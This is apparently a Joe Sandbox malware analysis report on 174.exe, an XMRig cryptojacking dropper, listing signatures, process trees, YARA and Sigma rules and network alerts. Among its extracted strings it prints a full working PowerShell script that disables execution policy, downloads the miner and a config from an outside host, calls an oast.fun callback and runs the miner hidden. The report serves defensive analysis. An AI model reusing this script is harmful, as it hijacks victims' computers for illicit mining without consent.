Edit tour

Windows Analysis Report
174.exe

Overview

General Information

Sample name:	174.exe
Analysis ID:	1585856
MD5:	594579e1df54a1b06ffabc55fea0b376
SHA1:	8638c9d3cbb31de291acd3f4ab2d859dc6615b23
SHA256:	8975061562d23fe044b62d89324687e6f03203062c6c026797795df247f4be30
Tags:	exemalwaremineruser-Joker
Infos:

Detection

Xmrig

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for dropped file

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Yara detected Xmrig cryptocurrency miner

Drops PE files to the startup folder

Found API chain with Download & Execute functionality

Found strings related to Crypto-Mining

Machine Learning detection for dropped file

Machine Learning detection for sample

Query firmware table information (likely to detect VMs)

Reads the Security eventlog

Reads the System eventlog

Sample is not signed and drops a device driver

Uses ping.exe to check the status of other devices and networks

Abnormal high CPU Usage

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Contains functionality to launch a program with higher privileges

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Creates driver files

Detected potential crypto function

Downloads executable code via HTTP

Dropped file seen in connection with other malware

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains an invalid checksum

PE file contains sections with non-standard names

PE file does not import any functions

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: PSScriptPolicyTest Creation By Uncommon Process

Sigma detected: Potential PowerShell Execution Policy Tampering

Sigma detected: Startup Folder File Write

Stores files to the Windows start menu directory

Suricata IDS alerts with low severity for network traffic

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

174.exe (PID: 6744 cmdline: "C:\Users\user\Desktop\174.exe" MD5: 594579E1DF54A1B06FFABC55FEA0B376)

chrtrome22.exe (PID: 5808 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe" MD5: AE96B1FB65498CDF458A52BC197466A5)

conhost.exe (PID: 5164 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

xmrig.exe (PID: 5752 cmdline: "C:\xmrig\xmrig-6.22.2\xmrig.exe" --config=C:\xmrig\xmrig-6.22.2\config.json MD5: F6D520AE125F03056C4646C508218D16)

conhost.exe (PID: 4136 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 4136 cmdline: "C:\Windows\System32\cmd.exe" /c ping wydkowqbjycsuwapzymz9igs0uo3k6tal.oast.fun MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 3492 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

PING.EXE (PID: 5408 cmdline: ping wydkowqbjycsuwapzymz9igs0uo3k6tal.oast.fun MD5: B3624DD758CCECF93A1226CEF252CA12)

chrtrome22.exe (PID: 5232 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe" MD5: AE96B1FB65498CDF458A52BC197466A5)

conhost.exe (PID: 6744 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

xmrig.exe (PID: 7340 cmdline: "C:\xmrig\xmrig-6.22.2\xmrig.exe" --config=C:\xmrig\xmrig-6.22.2\config.json MD5: F6D520AE125F03056C4646C508218D16)

conhost.exe (PID: 7348 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
xmrig	According to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.	No Attribution	https://gridinsoft.com/xmrig https://www.akamai.com/blog/security-research/2024-php-exploit-cve-one-day-after-disclosure https://www.crowdstrike.com/blog/new-kiss-a-dog-cryptojacking-campaign-targets-docker-and-kubernetes/	https://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security

Dropped Files

Source	Rule	Description	Author	Strings
C:\xmrig\xmrig-6.22.2\config.json	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
C:\xmrig\xmrig-6.22.2\xmrig.exe	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
C:\xmrig\xmrig-6.22.2\xmrig.exe	MacOS_Cryptominer_Xmrig_241780a1	unknown	unknown	0x586958:$a1: mining.set_target 0x581428:$a2: XMRIG_HOSTNAME 0x583500:$a3: Usage: xmrig [OPTIONS] 0x581400:$a4: XMRIG_VERSION
C:\xmrig\xmrig-6.22.2\xmrig.exe	MAL_XMR_Miner_May19_1	Detects Monero Crypto Coin Miner	Florian Roth	0x58d3a8:$x1: donate.ssl.xmrig.com 0x58d951:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
C:\xmrig\xmrig-6.22.2\xmrig.exe	MALWARE_Win_CoinMiner02	Detects coinmining malware	ditekSHen	0x58de98:$s1: %s/%s (Windows NT %lu.%lu 0x58ef00:$s3: \\.\WinRing0_ 0x5856f8:$s4: pool_wallet 0x580c68:$s5: cryptonight 0x580c78:$s5: cryptonight 0x580c88:$s5: cryptonight 0x580c98:$s5: cryptonight 0x580cb0:$s5: cryptonight 0x580cc0:$s5: cryptonight 0x580cd0:$s5: cryptonight 0x580ce8:$s5: cryptonight 0x580cf8:$s5: cryptonight 0x580d10:$s5: cryptonight 0x580d28:$s5: cryptonight 0x580d38:$s5: cryptonight 0x580d48:$s5: cryptonight 0x580d58:$s5: cryptonight 0x580d70:$s5: cryptonight 0x580d88:$s5: cryptonight 0x580d98:$s5: cryptonight 0x580da8:$s5: cryptonight

Memory Dumps

Source	Rule	Description	Author	Strings
00000001.00000002.1798535542.000000000300D000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000008.00000000.1796455258.00007FF602C90000.00000002.00000001.01000000.00000008.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
0000000C.00000002.2913382255.0000018E6124A000.00000004.00000001.00020000.00000000.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
0000000B.00000002.2912600466.0000022D4F288000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000008.00000002.2911452338.00000253A7F3D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000001.00000002.1798535542.0000000002D91000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000001.00000002.1798535542.0000000003021000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
0000000B.00000000.1861394280.00007FF602C90000.00000002.00000001.01000000.00000008.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000008.00000003.1799945020.00000253A7EF4000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000008.00000002.2911452338.00000253A7F5B000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000008.00000002.2911452338.00000253A7E99000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000008.00000000.1796096709.00007FF602807000.00000002.00000001.01000000.00000008.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000008.00000000.1796096709.00007FF602807000.00000002.00000001.01000000.00000008.sdmp	MacOS_Cryptominer_Xmrig_241780a1	unknown	unknown	0x160f58:$a1: mining.set_target 0x15ba28:$a2: XMRIG_HOSTNAME 0x15db00:$a3: Usage: xmrig [OPTIONS] 0x15ba00:$a4: XMRIG_VERSION
0000000B.00000002.2912600466.0000022D4F2B6000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000008.00000002.2911452338.00000253A7E6C000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000001.00000002.1802699525.000000001D56C000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
0000000B.00000000.1861121743.00007FF602807000.00000002.00000001.01000000.00000008.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
0000000B.00000000.1861121743.00007FF602807000.00000002.00000001.01000000.00000008.sdmp	MacOS_Cryptominer_Xmrig_241780a1	unknown	unknown	0x160f58:$a1: mining.set_target 0x15ba28:$a2: XMRIG_HOSTNAME 0x15db00:$a3: Usage: xmrig [OPTIONS] 0x15ba00:$a4: XMRIG_VERSION
00000001.00000002.1798535542.00000000030DF000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000009.00000002.2909797201.000001EEC29C8000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000006.00000002.1880311970.0000000003021000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000001.00000002.1798535542.0000000003001000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000006.00000002.1880311970.0000000002ED1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000001.00000002.1798535542.0000000002B51000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000006.00000002.1880311970.0000000002C91000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
Process Memory Space: chrtrome22.exe PID: 5808	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
Process Memory Space: chrtrome22.exe PID: 5232	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
Process Memory Space: xmrig.exe PID: 5752	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
Process Memory Space: xmrig.exe PID: 5752	MacOS_Cryptominer_Xmrig_241780a1	unknown	unknown	0x8ac19:$a1: mining.set_target 0x86aca:$a2: XMRIG_HOSTNAME 0x87df3:$a3: Usage: xmrig [OPTIONS] 0x86aab:$a4: XMRIG_VERSION
Process Memory Space: conhost.exe PID: 4136	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
Process Memory Space: xmrig.exe PID: 7340	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
Process Memory Space: xmrig.exe PID: 7340	MacOS_Cryptominer_Xmrig_241780a1	unknown	unknown	0x91b2b:$a1: mining.set_target 0x8d9dc:$a2: XMRIG_HOSTNAME 0x8ed05:$a3: Usage: xmrig [OPTIONS] 0x8d9bd:$a4: XMRIG_VERSION
Process Memory Space: conhost.exe PID: 7348	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
Click to see the 28 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
8.0.xmrig.exe.7ff6023e0000.0.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
8.0.xmrig.exe.7ff6023e0000.0.unpack	MacOS_Cryptominer_Xmrig_241780a1	unknown	unknown	0x586958:$a1: mining.set_target 0x581428:$a2: XMRIG_HOSTNAME 0x583500:$a3: Usage: xmrig [OPTIONS] 0x581400:$a4: XMRIG_VERSION
8.0.xmrig.exe.7ff6023e0000.0.unpack	MAL_XMR_Miner_May19_1	Detects Monero Crypto Coin Miner	Florian Roth	0x58d3a8:$x1: donate.ssl.xmrig.com 0x58d951:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
8.0.xmrig.exe.7ff6023e0000.0.unpack	MALWARE_Win_CoinMiner02	Detects coinmining malware	ditekSHen	0x58de98:$s1: %s/%s (Windows NT %lu.%lu 0x58ef00:$s3: \\.\WinRing0_ 0x5856f8:$s4: pool_wallet 0x580c68:$s5: cryptonight 0x580c78:$s5: cryptonight 0x580c88:$s5: cryptonight 0x580c98:$s5: cryptonight 0x580cb0:$s5: cryptonight 0x580cc0:$s5: cryptonight 0x580cd0:$s5: cryptonight 0x580ce8:$s5: cryptonight 0x580cf8:$s5: cryptonight 0x580d10:$s5: cryptonight 0x580d28:$s5: cryptonight 0x580d38:$s5: cryptonight 0x580d48:$s5: cryptonight 0x580d58:$s5: cryptonight 0x580d70:$s5: cryptonight 0x580d88:$s5: cryptonight 0x580d98:$s5: cryptonight 0x580da8:$s5: cryptonight
11.0.xmrig.exe.7ff6023e0000.0.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
11.0.xmrig.exe.7ff6023e0000.0.unpack	MacOS_Cryptominer_Xmrig_241780a1	unknown	unknown	0x586958:$a1: mining.set_target 0x581428:$a2: XMRIG_HOSTNAME 0x583500:$a3: Usage: xmrig [OPTIONS] 0x581400:$a4: XMRIG_VERSION
11.0.xmrig.exe.7ff6023e0000.0.unpack	MAL_XMR_Miner_May19_1	Detects Monero Crypto Coin Miner	Florian Roth	0x58d3a8:$x1: donate.ssl.xmrig.com 0x58d951:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
11.0.xmrig.exe.7ff6023e0000.0.unpack	MALWARE_Win_CoinMiner02	Detects coinmining malware	ditekSHen	0x58de98:$s1: %s/%s (Windows NT %lu.%lu 0x58ef00:$s3: \\.\WinRing0_ 0x5856f8:$s4: pool_wallet 0x580c68:$s5: cryptonight 0x580c78:$s5: cryptonight 0x580c88:$s5: cryptonight 0x580c98:$s5: cryptonight 0x580cb0:$s5: cryptonight 0x580cc0:$s5: cryptonight 0x580cd0:$s5: cryptonight 0x580ce8:$s5: cryptonight 0x580cf8:$s5: cryptonight 0x580d10:$s5: cryptonight 0x580d28:$s5: cryptonight 0x580d38:$s5: cryptonight 0x580d48:$s5: cryptonight 0x580d58:$s5: cryptonight 0x580d70:$s5: cryptonight 0x580d88:$s5: cryptonight 0x580d98:$s5: cryptonight 0x580da8:$s5: cryptonight
Click to see the 3 entries

Sigma Signatures

System Summary

Sigma detected: PSScriptPolicyTest Creation By Uncommon Process

Source: File created

Author: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe, ProcessId: 5808, TargetFilename: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_l4iyul4z.mba.ps1

Sigma detected: Potential PowerShell Execution Policy Tampering

Source: Registry Key set

Author: Nasreddine Bencherchali (Nextron Systems): Data: Details: Unrestricted, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe, ProcessId: 5808, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell\ExecutionPolicy

Sigma detected: Startup Folder File Write

Source: File created

Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\Desktop\174.exe, ProcessId: 6744, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe

Suricata Signatures

ET MALWARE CoinMiner Domain in DNS Lookup (pool .supportxmr .com)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-08T11:41:09.408405+0100	2047928	2	Crypto Currency Mining Activity Detected	192.168.2.4	51606	1.1.1.1	53	UDP

ETPRO MALWARE Common Downloader Header Pattern UHCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-08T11:40:59.072936+0100	2803270	2	Potentially Bad Traffic	192.168.2.4	49730	23.27.51.244	80	TCP

Joe Security ANOMALY Windows PowerShell HTTP activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-08T11:41:03.007566+0100	1810000	2	Potentially Bad Traffic	192.168.2.4	49731	140.82.121.3	443	TCP
2025-01-08T11:41:03.663052+0100	1810000	2	Potentially Bad Traffic	192.168.2.4	49732	185.199.109.133	443	TCP
2025-01-08T11:41:07.176947+0100	1810000	2	Potentially Bad Traffic	192.168.2.4	49733	104.21.95.99	443	TCP
2025-01-08T11:41:08.321577+0100	1810000	2	Potentially Bad Traffic	192.168.2.4	49734	206.189.156.69	80	TCP
2025-01-08T11:41:10.406010+0100	1810000	2	Potentially Bad Traffic	192.168.2.4	49736	140.82.121.3	443	TCP
2025-01-08T11:41:11.006027+0100	1810000	2	Potentially Bad Traffic	192.168.2.4	49737	185.199.109.133	443	TCP
2025-01-08T11:41:13.896682+0100	1810000	2	Potentially Bad Traffic	192.168.2.4	49739	104.21.95.99	443	TCP
2025-01-08T11:41:14.977817+0100	1810000	2	Potentially Bad Traffic	192.168.2.4	49741	206.189.156.69	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for dropped file

Source: C:\xmrig\xmrig-6.22.2\xmrig.exe	Avira: detection malicious, Label: HEUR/AGEN.1311679
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Avira: detection malicious, Label: HEUR/AGEN.1308614

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	ReversingLabs: Detection: 70%
Source: C:\xmrig\xmrig-6.22.2\xmrig.exe	ReversingLabs: Detection: 73%

Multi AV Scanner detection for submitted file

Source: 174.exe	Virustotal: Detection: 42%			Perma Link
Source: 174.exe	ReversingLabs: Detection: 47%

Machine Learning detection for dropped file

Source: C:\xmrig\xmrig-6.22.2\xmrig.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: 174.exe

Joe Sandbox ML: detected

Bitcoin Miner

Yara detected Xmrig cryptocurrency miner

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: 8.0.xmrig.exe.7ff6023e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.0.xmrig.exe.7ff6023e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.1798535542.000000000300D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000000.1796455258.00007FF602C90000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2913382255.0000018E6124A000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2912600466.0000022D4F288000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2911452338.00000253A7F3D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1798535542.0000000002D91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1798535542.0000000003021000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000000.1861394280.00007FF602C90000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.1799945020.00000253A7EF4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2911452338.00000253A7F5B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2911452338.00000253A7E99000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000000.1796096709.00007FF602807000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2912600466.0000022D4F2B6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2911452338.00000253A7E6C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1802699525.000000001D56C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000000.1861121743.00007FF602807000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1798535542.00000000030DF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2909797201.000001EEC29C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1880311970.0000000003021000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1798535542.0000000003001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1880311970.0000000002ED1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1798535542.0000000002B51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1880311970.0000000002C91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: chrtrome22.exe PID: 5808, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: chrtrome22.exe PID: 5232, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: xmrig.exe PID: 5752, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: conhost.exe PID: 4136, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: xmrig.exe PID: 7340, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: conhost.exe PID: 7348, type: MEMORYSTR
Source: Yara match	File source: C:\xmrig\xmrig-6.22.2\config.json, type: DROPPED
Source: Yara match	File source: C:\xmrig\xmrig-6.22.2\xmrig.exe, type: DROPPED

Found strings related to Crypto-Mining

Source: xmrig.exe, 00000008.00000000.1796096709.00007FF602807000.00000002.00000001.01000000.00000008.sdmp	String found in binary or memory: stratum+tcp://
Source: xmrig.exe, 00000008.00000000.1796096709.00007FF602807000.00000002.00000001.01000000.00000008.sdmp	String found in binary or memory: cryptonight/0
Source: xmrig.exe, 00000008.00000000.1796096709.00007FF602807000.00000002.00000001.01000000.00000008.sdmp	String found in binary or memory: stratum+tcp://
Source: xmrig.exe, 00000008.00000000.1796096709.00007FF602807000.00000002.00000001.01000000.00000008.sdmp	String found in binary or memory: -o, --url=URL URL of mining server
Source: xmrig.exe, 00000008.00000000.1796096709.00007FF602807000.00000002.00000001.01000000.00000008.sdmp	String found in binary or memory: Usage: xmrig [OPTIONS]
Source: chrtrome22.exe	String found in binary or memory: # Set Execution PolicySet-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy Unrestricted# Variables$xmrigUrl = "https://github.com/xmrig/xmrig/releases/download/v6.22.2/xmrig-6.22.2-msvc-win64.zip"$configUrl = "https://evilbit.pro/config.json"$oastUri = "http://wydkowqbjycsuwapzymz8ia5edhi9t1d7.oast.fun"$downloadPath = "$env:USERPROFILE\Downloads\xmrig.zip"$installPath = "C:\xmrig"$walletAddress = "45Lu4Zzcp64etdoVnc9jSU84WBygC7p5mdrowZic6LVDZERsDszFgcRcF63Gm6kVc7XsvgpvhH36SNfCmUAb1TwbSG7PVTa"$poolUrl = "pool.supportxmr.com:443"$workerName = "MyWorker"# Download XMRigWrite-Host "Downloading XMRig..."Invoke-WebRequest -Uri $xmrigUrl -OutFile $downloadPath -UseBasicParsing# Extract XMRigWrite-Host "Extracting XMRig..."Add-Type -AssemblyName System.IO.Compression.FileSystem[System.IO.Compression.ZipFile]::ExtractToDirectory($downloadPath, $installPath)# Download config.jsonWrite-Host "Downloading config.json..."$configPath = Join-Path $installPath "xmrig-6.22.2\config.json"Invoke-WebRequest -Uri $configUrl -OutFile $configPath -UseBasicParsing# Make GET request to the specified URIWrite-Host "Making GET request to the URI..."Invoke-WebRequest -Uri $oastUri -UseBasicParsing \| Out-Null# Start XMRig in a hidden windowWrite-Host "Starting XMRig in a hidden window..."$xmrigExe = Join-Path $installPath "xmrig-6.22.2\xmrig.exe"Start-Process -FilePath $xmrigExe -ArgumentList "--config=$configPath" -WindowStyle HiddenWrite-Host "XMRig has started mining in a hidden window! Use Task Manager to stop it if needed."

Source: unknown	HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.95.99:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.95.99:443 -> 192.168.2.4:49739 version: TLS 1.2

Source:

Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: chrtrome22.exe, 00000001.00000002.1798535542.00000000030C0000.00000004.00000800.00020000.00000000.sdmp, chrtrome22.exe, 00000001.00000002.1798535542.00000000030C9000.00000004.00000800.00020000.00000000.sdmp, WinRing0x64.sys.1.dr

Networking

Uses ping.exe to check the status of other devices and networks

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\PING.EXE ping wydkowqbjycsuwapzymz9igs0uo3k6tal.oast.fun

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 08 Jan 2025 10:40:59 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Sun, 05 Jan 2025 18:06:51 GMTETag: "3400-62af96050fbc7"Accept-Ranges: bytesContent-Length: 13312Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 be c9 7a 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 18 00 00 00 1a 00 00 00 00 00 00 be 37 00 00 00 20 00 00 00 40 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 00 00 00 02 00 00 00 00 00 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 68 37 00 00 53 00 00 00 00 40 00 00 60 17 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c4 17 00 00 00 20 00 00 00 18 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 60 17 00 00 00 40 00 00 00 18 00 00 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 60 00 00 00 02 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 37 00 00 00 00 00 00 48 00 00 00 02 00 05 00 3c 29 00 00 2c 0e 00 00 01 00 00 00 03 00 00 06 38 24 00 00 01 05 00 00 00 00 00 